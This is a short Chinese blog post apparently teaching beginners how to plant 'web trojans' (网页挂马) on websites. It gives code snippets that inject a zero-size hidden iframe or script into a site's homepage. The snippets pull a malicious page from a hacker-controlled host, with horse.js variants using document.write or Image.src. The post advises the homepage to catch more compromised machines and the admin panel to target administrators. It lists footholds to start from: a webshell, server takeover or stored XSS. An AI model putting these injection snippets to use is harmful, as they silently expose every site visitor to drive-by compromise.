初学网页挂马

我觉得网页挂马要考虑两个因素:隐蔽性、成功率。


我们只需保证浏览器加载并执行我们构造的特殊网页即可,这样的方法有许多。


方法一,我们可以在首页加入以下这行代码。

<iframe src="http://www.hacker.com/horse.html" width=0 height=0></iframe>


方法二,我们可以在首页加入以下这行代码。

<script str="http://www.test.com/horse.js"></script>

horse.js可以这样写:

new Image.src="http://www.hacker.com/horse.html";

或者

document.write("<iframe src='http://www.hacker.com/horse.html' width=0 height=0></iframe>");


考虑到隐蔽性建议采用第二种方法。挂在首页是因为首页的访问量是最大的,这样可以收获更多的肉鸡。当然,如果你的目标仅是网站管理员,那么你可以考虑挂在后台主页,当然还可以加其它条件以提高定点挂马的精准度。


什么情况下可以进行网页挂马,这个就看你思路够不够猥琐了。比如:1.有后台管理权限;2.拿下了webshell;3.拿下了服务器;4.存储型 XSS;




评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值